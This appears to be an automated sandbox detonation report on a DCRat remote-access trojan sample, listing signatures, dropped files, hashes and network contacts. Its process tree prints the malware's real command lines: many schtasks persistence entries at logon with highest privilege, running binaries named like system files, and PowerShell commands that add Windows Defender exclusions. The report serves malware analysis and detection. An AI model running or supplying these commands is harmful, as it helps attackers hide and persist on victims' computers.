Analysis Overview
SHA256
b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0
Threat Level: Known bad
The file JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0 was found to be: Known bad.
Malicious Activity Summary
DCRat payload
Process spawned unexpected child process
DcRat
Dcrat family
DCRat payload
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in Program Files directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-30 02:14
Signatures
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Dcrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-30 02:14
Reported
2024-12-30 02:16
Platform
win7-20240903-en
Max time kernel
144s
Max time network
139s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\providercommon\DllCommonsvc.exe | N/A |
| N/A | N/A | C:\providercommon\DllCommonsvc.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
| N/A | N/A | C:\Windows\Tasks\conhost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\7-Zip\e978f868350d50 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Media Player\cmd.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\cmd.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Media Player\ebf1f9fa8afd6d | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows NT\TableTextService\5940a34987c991 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\7-Zip\powershell.exe | C:\providercommon\DllCommonsvc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\24dbde2999530e | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\Tasks\conhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\Tasks\088424020bedd6 | C:\providercommon\DllCommonsvc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b912e5b5486c7069718b52f0ed1a857a05f83f287f58205405d6bb77218642a0.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\providercommon\1zu9dW.bat" "
C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Media Player\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\providercommon\lsm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\providercommon\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\providercommon\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Default\NetHood\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default\NetHood\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Users\Default\NetHood\services.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\cmd.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\lsm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\services.exe'
C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 8 /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\powershell.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\Tasks\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Tasks\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\Tasks\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\Program Files\7-Zip\powershell.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\7-Zip\powershell.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\powershell.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PCHEALTH\ERRORREP\QSIGNOFF\WmiPrvSE.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\TableTextService\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1f5748e2-69f6-11ef-b486-62cb582c238c\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Tasks\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\powershell.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oiLsI5McyI.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\raSqT8qddO.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jkzlbVqk90.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\z7AIE64VZ5.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\76lQa6YaxV.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QqrgVo7Q94.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F82V1kRox2.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LabqbH8bfv.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2wrSnsL5gc.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtQmBjXbDh.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\D6YKtyItKL.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eTpA0L9dlX.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Tasks\conhost.exe
"C:\Windows\Tasks\conhost.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
Files
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe
| MD5 | 8088241160261560a02c84025d107592 |
| SHA1 | 083121f7027557570994c9fc211df61730455bb5 |
| SHA256 | 2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1 |
| SHA512 | 20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478 |
C:\providercommon\1zu9dW.bat
| MD5 | 6783c3ee07c7d151ceac57f1f9c8bed7 |
| SHA1 | 17468f98f95bf504cc1f83c49e49a78526b3ea03 |
| SHA256 | 8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322 |
| SHA512 | c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8 |
C:\providercommon\DllCommonsvc.exe
| MD5 | bd31e94b4143c4ce49c17d3af46bcad0 |
| SHA1 | f8c51ff3ff909531d9469d4ba1bbabae101853ff |
| SHA256 | b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63 |
| SHA512 | f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394 |
memory/2772-13-0x0000000000F30000-0x0000000001040000-memory.dmp
memory/2772-14-0x0000000000240000-0x0000000000252000-memory.dmp
memory/2772-15-0x0000000000260000-0x000000000026C000-memory.dmp
memory/2772-16-0x0000000000250000-0x000000000025C000-memory.dmp
memory/2772-17-0x00000000003F0000-0x00000000003FC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 84c43e122c93dd25ec69d138c0fa5605 |
| SHA1 | 56d44cf56a7efa1dc8cd4d4eea11c85f2441a88d |
| SHA256 | 1df1215850a195be32d0c76ac2df5eab071a08b5e408bc5fabad89f191a292c9 |
| SHA512 | 1047f54c9218020fff38990f8a54ca8b14ddb9387060250fd5d1701ff8f2c8b191a06620195ee40a733cecd2f8e4c92cbc4fb9f6f52e8f999fa90789db5bf07b |
memory/1976-43-0x00000000023D0000-0x00000000023D8000-memory.dmp
memory/1976-37-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\oiLsI5McyI.bat
| MD5 | 16d3cdf819fb382f6c683381076724f8 |
| SHA1 | 9f47aae25e4ed10d823f92c1b0779c23de0415da |
| SHA256 | 56892492b289b0a3237d54cfdccf4f142e077b8eaf4e8560ce0e9cc34a755de8 |
| SHA512 | 86ac754c78b07e79b2bf2ef1e8d5d2575c3783eb19f023fa8569c5eb80c3b71b34e41e53adb50c4d89cdd4f1a1595a13ec4f1ab2bbf598a952fb69eaf2aec011 |
memory/2568-89-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
memory/2568-84-0x000000001B760000-0x000000001BA42000-memory.dmp
memory/632-123-0x0000000000E10000-0x0000000000F20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab5EF4.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar5F06.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\raSqT8qddO.bat
| MD5 | 02b1b942132f258a8009c011fd791dcd |
| SHA1 | 24383b36a1598d420aa90a197b653104950e1303 |
| SHA256 | 830280d38ee2ba72e77cb2f53fd73b7117b9cd008f6e04c3b9920563199ce248 |
| SHA512 | ccf1177d6d5d82727dee2718014f9055f151e9aa91b47975f1fa5c9c9c6e9c1a8770cf4cbdae84b5581413bd1c18153e8e6add1e0c1356a2bdd9a83ccbd4f07f |
